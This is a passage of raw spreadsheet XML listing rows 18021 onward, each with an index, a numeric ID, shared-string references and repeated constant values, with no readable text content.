      <c r="B18021" s="2">
        <v>4.2579141E7</v>
      </c>
      <c r="C18021" s="2" t="s">
        <v>17372</v>
      </c>
      <c r="D18021" s="2">
        <v>1.0</v>
      </c>
      <c r="E18021" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18021" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18022" ht="15.75" customHeight="1">
      <c r="A18022" s="1">
        <v>4510.0</v>
      </c>
      <c r="B18022" s="2">
        <v>4.2586294E7</v>
      </c>
      <c r="C18022" s="2" t="s">
        <v>17373</v>
      </c>
      <c r="D18022" s="2">
        <v>1.0</v>
      </c>
      <c r="E18022" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18022" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18023" ht="15.75" customHeight="1">
      <c r="A18023" s="1">
        <v>5365.0</v>
      </c>
      <c r="B18023" s="2">
        <v>4.5381227E7</v>
      </c>
      <c r="C18023" s="2" t="s">
        <v>17374</v>
      </c>
      <c r="D18023" s="2">
        <v>1.0</v>
      </c>
      <c r="E18023" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18023" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18024" ht="15.75" customHeight="1">
      <c r="A18024" s="1">
        <v>6114.0</v>
      </c>
      <c r="B18024" s="2">
        <v>4.7769597E7</v>
      </c>
      <c r="C18024" s="2" t="s">
        <v>17375</v>
      </c>
      <c r="D18024" s="2">
        <v>1.0</v>
      </c>
      <c r="E18024" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18024" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18025" ht="15.75" customHeight="1">
      <c r="A18025" s="1">
        <v>6652.0</v>
      </c>
      <c r="B18025" s="2">
        <v>4.909109E7</v>
      </c>
      <c r="C18025" s="2" t="s">
        <v>17376</v>
      </c>
      <c r="D18025" s="2">
        <v>1.0</v>
      </c>
      <c r="E18025" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18025" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18026" ht="15.75" customHeight="1">
      <c r="A18026" s="1">
        <v>7057.0</v>
      </c>
      <c r="B18026" s="2">
        <v>5.0200467E7</v>
      </c>
      <c r="C18026" s="2" t="s">
        <v>17377</v>
      </c>
      <c r="D18026" s="2">
        <v>1.0</v>
      </c>
      <c r="E18026" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18026" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18027" ht="15.75" customHeight="1">
      <c r="A18027" s="1">
        <v>7124.0</v>
      </c>
      <c r="B18027" s="2">
        <v>5.0420678E7</v>
      </c>
      <c r="C18027" s="2" t="s">
        <v>17378</v>
      </c>
      <c r="D18027" s="2">
        <v>1.0</v>
      </c>
      <c r="E18027" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18027" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18028" ht="15.75" customHeight="1">
      <c r="A18028" s="1">
        <v>7497.0</v>
      </c>
      <c r="B18028" s="2">
        <v>5.1382338E7</v>
      </c>
      <c r="C18028" s="2" t="s">
        <v>17379</v>
      </c>
      <c r="D18028" s="2">
        <v>1.0</v>
      </c>
      <c r="E18028" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18028" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18029" ht="15.75" customHeight="1">
      <c r="A18029" s="1">
        <v>7510.0</v>
      </c>
      <c r="B18029" s="2">
        <v>5.1404468E7</v>
      </c>
      <c r="C18029" s="2" t="s">
        <v>17380</v>
      </c>
      <c r="D18029" s="2">
        <v>1.0</v>
      </c>
      <c r="E18029" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18029" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18030" ht="15.75" customHeight="1">
      <c r="A18030" s="1">
        <v>7518.0</v>
      </c>
      <c r="B18030" s="2">
        <v>5.1411015E7</v>
      </c>
      <c r="C18030" s="2" t="s">
        <v>17381</v>
      </c>
      <c r="D18030" s="2">
        <v>1.0</v>
      </c>
      <c r="E18030" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18030" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18031" ht="15.75" customHeight="1">
      <c r="A18031" s="1">
        <v>8899.0</v>
      </c>
      <c r="B18031" s="2">
        <v>5.4794797E7</v>
      </c>
      <c r="C18031" s="2" t="s">
        <v>17382</v>
      </c>
      <c r="D18031" s="2">
        <v>1.0</v>
      </c>
      <c r="E18031" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18031" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18032" ht="15.75" customHeight="1">
      <c r="A18032" s="1">
        <v>9114.0</v>
      </c>
      <c r="B18032" s="2">
        <v>5.5204148E7</v>
      </c>
      <c r="C18032" s="2" t="s">
        <v>17383</v>
      </c>
      <c r="D18032" s="2">
        <v>1.0</v>
      </c>
      <c r="E18032" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18032" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18033" ht="15.75" customHeight="1">
      <c r="A18033" s="1">
        <v>9598.0</v>
      </c>
      <c r="B18033" s="2">
        <v>5.6135513E7</v>
      </c>
      <c r="C18033" s="2" t="s">
        <v>17384</v>
      </c>
      <c r="D18033" s="2">
        <v>1.0</v>
      </c>
      <c r="E18033" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18033" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18034" ht="15.75" customHeight="1">
      <c r="A18034" s="1">
        <v>9785.0</v>
      </c>
      <c r="B18034" s="2">
        <v>5.6518536E7</v>
      </c>
      <c r="C18034" s="2" t="s">
        <v>17385</v>
      </c>
      <c r="D18034" s="2">
        <v>1.0</v>
      </c>
      <c r="E18034" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18034" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18035" ht="15.75" customHeight="1">
      <c r="A18035" s="1">
        <v>10644.0</v>
      </c>
      <c r="B18035" s="2">
        <v>1.4148418E7</v>
      </c>
      <c r="C18035" s="2" t="s">
        <v>17386</v>
      </c>
      <c r="D18035" s="2">
        <v>1.0</v>
      </c>
      <c r="E18035" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18035" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18036" ht="15.75" customHeight="1">
      <c r="A18036" s="1">
        <v>10831.0</v>
      </c>
      <c r="B18036" s="2">
        <v>1.5992104E7</v>
      </c>
      <c r="C18036" s="2" t="s">
        <v>17387</v>
      </c>
      <c r="D18036" s="2">
        <v>1.0</v>
      </c>
      <c r="E18036" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18036" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18037" ht="15.75" customHeight="1">
      <c r="A18037" s="1">
        <v>11334.0</v>
      </c>
      <c r="B18037" s="2">
        <v>2.1188968E7</v>
      </c>
      <c r="C18037" s="2" t="s">
        <v>17388</v>
      </c>
      <c r="D18037" s="2">
        <v>1.0</v>
      </c>
      <c r="E18037" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18037" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18038" ht="15.75" customHeight="1">
      <c r="A18038" s="1">
        <v>11478.0</v>
      </c>
      <c r="B18038" s="2">
        <v>2.1976515E7</v>
      </c>
      <c r="C18038" s="2" t="s">
        <v>17389</v>
      </c>
      <c r="D18038" s="2">
        <v>1.0</v>
      </c>
      <c r="E18038" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18038" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18039" ht="15.75" customHeight="1">
      <c r="A18039" s="1">
        <v>11915.0</v>
      </c>
      <c r="B18039" s="2">
        <v>2.5255177E7</v>
      </c>
      <c r="C18039" s="2" t="s">
        <v>17390</v>
      </c>
      <c r="D18039" s="2">
        <v>1.0</v>
      </c>
      <c r="E18039" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18039" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18040" ht="15.75" customHeight="1">
      <c r="A18040" s="1">
        <v>11981.0</v>
      </c>
      <c r="B18040" s="2">
        <v>2.5832377E7</v>
      </c>
      <c r="C18040" s="2" t="s">
        <v>17391</v>
      </c>
      <c r="D18040" s="2">
        <v>1.0</v>
      </c>
      <c r="E18040" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18040" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18041" ht="15.75" customHeight="1">
      <c r="A18041" s="1">
        <v>12000.0</v>
      </c>
      <c r="B18041" s="2">
        <v>2.5961838E7</v>
      </c>
      <c r="C18041" s="2" t="s">
        <v>17392</v>
      </c>
      <c r="D18041" s="2">
        <v>1.0</v>
      </c>
      <c r="E18041" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18041" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18042" ht="15.75" customHeight="1">
      <c r="A18042" s="1">
        <v>12293.0</v>
      </c>
      <c r="B18042" s="2">
        <v>2.8263243E7</v>
      </c>
      <c r="C18042" s="2" t="s">
        <v>17393</v>
      </c>
      <c r="D18042" s="2">
        <v>1.0</v>
      </c>
      <c r="E18042" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18042" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18043" ht="15.75" customHeight="1">
      <c r="A18043" s="1">
        <v>12658.0</v>
      </c>
      <c r="B18043" s="2">
        <v>3.0484541E7</v>
      </c>
      <c r="C18043" s="2" t="s">
        <v>17394</v>
      </c>
      <c r="D18043" s="2">
        <v>1.0</v>
      </c>
      <c r="E18043" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18043" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18044" ht="15.75" customHeight="1">
      <c r="A18044" s="1">
        <v>12846.0</v>
      </c>
      <c r="B18044" s="2">
        <v>3.1767259E7</v>
      </c>
      <c r="C18044" s="2" t="s">
        <v>17395</v>
      </c>
      <c r="D18044" s="2">
        <v>1.0</v>
      </c>
      <c r="E18044" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18044" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18045" ht="15.75" customHeight="1">
      <c r="A18045" s="1">
        <v>12879.0</v>
      </c>
      <c r="B18045" s="2">
        <v>3.1977162E7</v>
      </c>
      <c r="C18045" s="2" t="s">
        <v>17396</v>
      </c>
      <c r="D18045" s="2">
        <v>1.0</v>
      </c>
      <c r="E18045" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18045" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18046" ht="15.75" customHeight="1">
      <c r="A18046" s="1">
        <v>13042.0</v>
      </c>
      <c r="B18046" s="2">
        <v>3.3077997E7</v>
      </c>
      <c r="C18046" s="2" t="s">
        <v>17397</v>
      </c>
      <c r="D18046" s="2">
        <v>1.0</v>
      </c>
      <c r="E18046" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18046" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18047" ht="15.75" customHeight="1">
      <c r="A18047" s="1">
        <v>13166.0</v>
      </c>
      <c r="B18047" s="2">
        <v>3.3978465E7</v>
      </c>
      <c r="C18047" s="2" t="s">
        <v>17398</v>
      </c>
      <c r="D18047" s="2">
        <v>1.0</v>
      </c>
      <c r="E18047" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18047" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18048" ht="15.75" customHeight="1">
      <c r="A18048" s="1">
        <v>13503.0</v>
      </c>
      <c r="B18048" s="2">
        <v>3543537.0</v>
      </c>
      <c r="C18048" s="2" t="s">
        <v>17399</v>
      </c>
      <c r="D18048" s="2">
        <v>1.0</v>
      </c>
      <c r="E18048" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18048" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18049" ht="15.75" customHeight="1">
      <c r="A18049" s="1">
        <v>14140.0</v>
      </c>
      <c r="B18049" s="2">
        <v>3.793798E7</v>
      </c>
      <c r="C18049" s="2" t="s">
        <v>17400</v>
      </c>
      <c r="D18049" s="2">
        <v>1.0</v>
      </c>
      <c r="E18049" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18049" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18050" ht="15.75" customHeight="1">
      <c r="A18050" s="1">
        <v>14279.0</v>
      </c>
      <c r="B18050" s="2">
        <v>3.8467628E7</v>
      </c>
      <c r="C18050" s="2" t="s">
        <v>17401</v>
      </c>
      <c r="D18050" s="2">
        <v>1.0</v>
      </c>
      <c r="E18050" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18050" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18051" ht="15.75" customHeight="1">
      <c r="A18051" s="1">
        <v>14530.0</v>
      </c>
      <c r="B18051" s="2">
        <v>3.9827652E7</v>
      </c>
      <c r="C18051" s="2" t="s">
        <v>17402</v>
      </c>
      <c r="D18051" s="2">
        <v>1.0</v>
      </c>
      <c r="E18051" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18051" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18052" ht="15.75" customHeight="1">
      <c r="A18052" s="1">
        <v>14924.0</v>
      </c>
      <c r="B18052" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C18052" s="2" t="s">
        <v>17403</v>
      </c>
      <c r="D18052" s="2">
        <v>1.0</v>
      </c>
      <c r="E18052" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18052" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18053" ht="15.75" customHeight="1">
      <c r="A18053" s="1">
        <v>15990.0</v>
      </c>
      <c r="B18053" s="2">
        <v>4.4931773E7</v>
      </c>
      <c r="C18053" s="2" t="s">
        <v>17404</v>
      </c>
      <c r="D18053" s="2">
        <v>1.0</v>
      </c>
      <c r="E18053" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18053" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18054" ht="15.75" customHeight="1">
      <c r="A18054" s="1">
        <v>16192.0</v>
      </c>
      <c r="B18054" s="2">
        <v>4.56606E7</v>
      </c>
      <c r="C18054" s="2" t="s">
        <v>17405</v>
      </c>
      <c r="D18054" s="2">
        <v>1.0</v>
      </c>
      <c r="E18054" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18054" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18055" ht="15.75" customHeight="1">
      <c r="A18055" s="1">
        <v>16647.0</v>
      </c>
      <c r="B18055" s="2">
        <v>4.7174926E7</v>
      </c>
      <c r="C18055" s="2" t="s">
        <v>17406</v>
      </c>
      <c r="D18055" s="2">
        <v>1.0</v>
      </c>
      <c r="E18055" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18055" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18056" ht="15.75" customHeight="1">
      <c r="A18056" s="1">
        <v>17120.0</v>
      </c>
      <c r="B18056" s="2">
        <v>4.8782061E7</v>
      </c>
      <c r="C18056" s="2" t="s">
        <v>17407</v>
      </c>
      <c r="D18056" s="2">
        <v>1.0</v>
      </c>
      <c r="E18056" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18056" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18057" ht="15.75" customHeight="1">
      <c r="A18057" s="1">
        <v>17458.0</v>
      </c>
      <c r="B18057" s="2">
        <v>4.9843593E7</v>
      </c>
      <c r="C18057" s="2" t="s">
        <v>17408</v>
      </c>
      <c r="D18057" s="2">
        <v>1.0</v>
      </c>
      <c r="E18057" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18057" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18058" ht="15.75" customHeight="1">
      <c r="A18058" s="1">
        <v>17718.0</v>
      </c>
      <c r="B18058" s="2">
        <v>5.0620875E7</v>
      </c>
      <c r="C18058" s="2" t="s">
        <v>17409</v>
      </c>
      <c r="D18058" s="2">
        <v>1.0</v>
      </c>
      <c r="E18058" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18058" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18059" ht="15.75" customHeight="1">
      <c r="A18059" s="1">
        <v>17840.0</v>
      </c>
      <c r="B18059" s="2">
        <v>5.0948307E7</v>
      </c>
      <c r="C18059" s="2" t="s">
        <v>17410</v>
      </c>
      <c r="D18059" s="2">
        <v>1.0</v>
      </c>
      <c r="E18059" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18059" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18060" ht="15.75" customHeight="1">
      <c r="A18060" s="1">
        <v>17985.0</v>
      </c>
      <c r="B18060" s="2">
        <v>5.139177E7</v>
      </c>
      <c r="C18060" s="2" t="s">
        <v>17411</v>
      </c>
      <c r="D18060" s="2">
        <v>1.0</v>
      </c>
      <c r="E18060" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18060" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18061" ht="15.75" customHeight="1">
      <c r="A18061" s="1">
        <v>18166.0</v>
      </c>
      <c r="B18061" s="2">
        <v>5.1919043E7</v>
      </c>
      <c r="C18061" s="2" t="s">
        <v>17412</v>
      </c>
      <c r="D18061" s="2">
        <v>1.0</v>
      </c>
      <c r="E18061" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18061" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18062" ht="15.75" customHeight="1">
      <c r="A18062" s="1">
        <v>18322.0</v>
      </c>
      <c r="B18062" s="2">
        <v>5.2401591E7</v>
      </c>
      <c r="C18062" s="2" t="s">
        <v>17413</v>
      </c>
      <c r="D18062" s="2">
        <v>1.0</v>
      </c>
      <c r="E18062" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18062" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18063" ht="15.75" customHeight="1">
      <c r="A18063" s="1">
        <v>18555.0</v>
      </c>
      <c r="B18063" s="2">
        <v>5.3161505E7</v>
      </c>
      <c r="C18063" s="2" t="s">
        <v>17414</v>
      </c>
      <c r="D18063" s="2">
        <v>1.0</v>
      </c>
      <c r="E18063" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18063" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18064" ht="15.75" customHeight="1">
      <c r="A18064" s="1">
        <v>18962.0</v>
      </c>
      <c r="B18064" s="2">
        <v>5.435524E7</v>
      </c>
      <c r="C18064" s="2" t="s">
        <v>17415</v>
      </c>
      <c r="D18064" s="2">
        <v>1.0</v>
      </c>
      <c r="E18064" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18064" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18065" ht="15.75" customHeight="1">
      <c r="A18065" s="1">
        <v>20075.0</v>
      </c>
      <c r="B18065" s="2">
        <v>9025401.0</v>
      </c>
      <c r="C18065" s="2" t="s">
        <v>17416</v>
      </c>
      <c r="D18065" s="2">
        <v>1.0</v>
      </c>
      <c r="E18065" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18065" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18066" ht="15.75" customHeight="1">
      <c r="A18066" s="1">
        <v>20277.0</v>
      </c>
      <c r="B18066" s="2">
        <v>1.1151496E7</v>
      </c>
      <c r="C18066" s="2" t="s">
        <v>17417</v>
      </c>
      <c r="D18066" s="2">
        <v>1.0</v>
      </c>
      <c r="E18066" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18066" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18067" ht="15.75" customHeight="1">
      <c r="A18067" s="1">
        <v>20517.0</v>
      </c>
      <c r="B18067" s="2">
        <v>1.3075094E7</v>
      </c>
      <c r="C18067" s="2" t="s">
        <v>17418</v>
      </c>
      <c r="D18067" s="2">
        <v>1.0</v>
      </c>
      <c r="E18067" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18067" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18068" ht="15.75" customHeight="1">
      <c r="A18068" s="1">
        <v>20568.0</v>
      </c>
      <c r="B18068" s="2">
        <v>1.349853E7</v>
      </c>
      <c r="C18068" s="2" t="s">
        <v>17419</v>
      </c>
      <c r="D18068" s="2">
        <v>1.0</v>
      </c>
      <c r="E18068" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18068" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18069" ht="15.75" customHeight="1">
      <c r="A18069" s="1">
        <v>20827.0</v>
      </c>
      <c r="B18069" s="2">
        <v>1.5452795E7</v>
      </c>
      <c r="C18069" s="2" t="s">
        <v>17420</v>
      </c>
      <c r="D18069" s="2">
        <v>1.0</v>
      </c>
      <c r="E18069" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18069" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18070" ht="15.75" customHeight="1">
      <c r="A18070" s="1">
        <v>20941.0</v>
      </c>
      <c r="B18070" s="2">
        <v>1.6503019E7</v>
      </c>
      <c r="C18070" s="2" t="s">
        <v>17421</v>
      </c>
      <c r="D18070" s="2">
        <v>1.0</v>
      </c>
      <c r="E18070" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18070" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18071" ht="15.75" customHeight="1">
      <c r="A18071" s="1">
        <v>21227.0</v>
      </c>
      <c r="B18071" s="2">
        <v>1.9640835E7</v>
      </c>
      <c r="C18071" s="2" t="s">
        <v>17422</v>
      </c>
      <c r="D18071" s="2">
        <v>1.0</v>
      </c>
      <c r="E18071" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18071" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18072" ht="15.75" customHeight="1">
      <c r="A18072" s="1">
        <v>21248.0</v>
      </c>
      <c r="B18072" s="2">
        <v>1.9973809E7</v>
      </c>
      <c r="C18072" s="2" t="s">
        <v>17423</v>
      </c>
      <c r="D18072" s="2">
        <v>1.0</v>
      </c>
      <c r="E18072" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18072" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18073" ht="15.75" customHeight="1">
      <c r="A18073" s="1">
        <v>21457.0</v>
      </c>
      <c r="B18073" s="2">
        <v>2.2686182E7</v>
      </c>
      <c r="C18073" s="2" t="s">
        <v>17424</v>
      </c>
      <c r="D18073" s="2">
        <v>1.0</v>
      </c>
      <c r="E18073" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18073" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18074" ht="15.75" customHeight="1">
      <c r="A18074" s="1">
        <v>21964.0</v>
      </c>
      <c r="B18074" s="2">
        <v>2.9066509E7</v>
      </c>
      <c r="C18074" s="2" t="s">
        <v>17425</v>
      </c>
      <c r="D18074" s="2">
        <v>1.0</v>
      </c>
      <c r="E18074" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18074" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18075" ht="15.75" customHeight="1">
      <c r="A18075" s="1">
        <v>22110.0</v>
      </c>
      <c r="B18075" s="2">
        <v>3.0951873E7</v>
      </c>
      <c r="C18075" s="2" t="s">
        <v>17426</v>
      </c>
      <c r="D18075" s="2">
        <v>1.0</v>
      </c>
      <c r="E18075" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18075" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18076" ht="15.75" customHeight="1">
      <c r="A18076" s="1">
        <v>22306.0</v>
      </c>
      <c r="B18076" s="2">
        <v>3.3714433E7</v>
      </c>
      <c r="C18076" s="2" t="s">
        <v>17427</v>
      </c>
      <c r="D18076" s="2">
        <v>1.0</v>
      </c>
      <c r="E18076" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18076" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18077" ht="15.75" customHeight="1">
      <c r="A18077" s="1">
        <v>22441.0</v>
      </c>
      <c r="B18077" s="2">
        <v>3625042.0</v>
      </c>
      <c r="C18077" s="2" t="s">
        <v>17428</v>
      </c>
      <c r="D18077" s="2">
        <v>1.0</v>
      </c>
      <c r="E18077" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18077" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18078" ht="15.75" customHeight="1">
      <c r="A18078" s="1">
        <v>22875.0</v>
      </c>
      <c r="B18078" s="2">
        <v>4.7524184E7</v>
      </c>
      <c r="C18078" s="2" t="s">
        <v>17429</v>
      </c>
      <c r="D18078" s="2">
        <v>1.0</v>
      </c>
      <c r="E18078" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18078" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18079" ht="15.75" customHeight="1">
      <c r="A18079" s="1">
        <v>23502.0</v>
      </c>
      <c r="B18079" s="2">
        <v>5780053.0</v>
      </c>
      <c r="C18079" s="2" t="s">
        <v>17430</v>
      </c>
      <c r="D18079" s="2">
        <v>1.0</v>
      </c>
      <c r="E18079" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18079" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18080" ht="15.75" customHeight="1">
      <c r="A18080" s="1">
        <v>23748.0</v>
      </c>
      <c r="B18080" s="2">
        <v>7430210.0</v>
      </c>
      <c r="C18080" s="2" t="s">
        <v>17431</v>
      </c>
      <c r="D18080" s="2">
        <v>1.0</v>
      </c>
      <c r="E18080" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18080" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18081" ht="15.75" customHeight="1">
      <c r="A18081" s="1">
        <v>24171.0</v>
      </c>
      <c r="B18081" s="2">
        <v>1.0202058E7</v>
      </c>
      <c r="C18081" s="2" t="s">
        <v>17432</v>
      </c>
      <c r="D18081" s="2">
        <v>1.0</v>
      </c>
      <c r="E18081" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18081" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18082" ht="15.75" customHeight="1">
      <c r="A18082" s="1">
        <v>24220.0</v>
      </c>
      <c r="B18082" s="2">
        <v>1.0422571E7</v>
      </c>
      <c r="C18082" s="2" t="s">
        <v>17433</v>
      </c>
      <c r="D18082" s="2">
        <v>1.0</v>
      </c>
      <c r="E18082" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18082" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18083" ht="15.75" customHeight="1">
      <c r="A18083" s="1">
        <v>24337.0</v>
      </c>
      <c r="B18083" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C18083" s="2" t="s">
        <v>17434</v>
      </c>
      <c r="D18083" s="2">
        <v>1.0</v>
      </c>
      <c r="E18083" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18083" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18084" ht="15.75" customHeight="1">
      <c r="A18084" s="1">
        <v>24458.0</v>
      </c>
      <c r="B18084" s="2">
        <v>1.0942191E7</v>
      </c>
      <c r="C18084" s="2" t="s">
        <v>17435</v>
      </c>
      <c r="D18084" s="2">
        <v>1.0</v>
      </c>
      <c r="E18084" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18084" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18085" ht="15.75" customHeight="1">
      <c r="A18085" s="1">
        <v>24609.0</v>
      </c>
      <c r="B18085" s="2">
        <v>1.1435929E7</v>
      </c>
      <c r="C18085" s="2" t="s">
        <v>17436</v>
      </c>
      <c r="D18085" s="2">
        <v>1.0</v>
      </c>
      <c r="E18085" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18085" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18086" ht="15.75" customHeight="1">
      <c r="A18086" s="1">
        <v>25001.0</v>
      </c>
      <c r="B18086" s="2">
        <v>1.269993E7</v>
      </c>
      <c r="C18086" s="2" t="s">
        <v>17437</v>
      </c>
      <c r="D18086" s="2">
        <v>1.0</v>
      </c>
      <c r="E18086" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18086" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18087" ht="15.75" customHeight="1">
      <c r="A18087" s="1">
        <v>25351.0</v>
      </c>
      <c r="B18087" s="2">
        <v>1.3553041E7</v>
      </c>
      <c r="C18087" s="2" t="s">
        <v>17438</v>
      </c>
      <c r="D18087" s="2">
        <v>1.0</v>
      </c>
      <c r="E18087" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18087" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18088" ht="15.75" customHeight="1">
      <c r="A18088" s="1">
        <v>25613.0</v>
      </c>
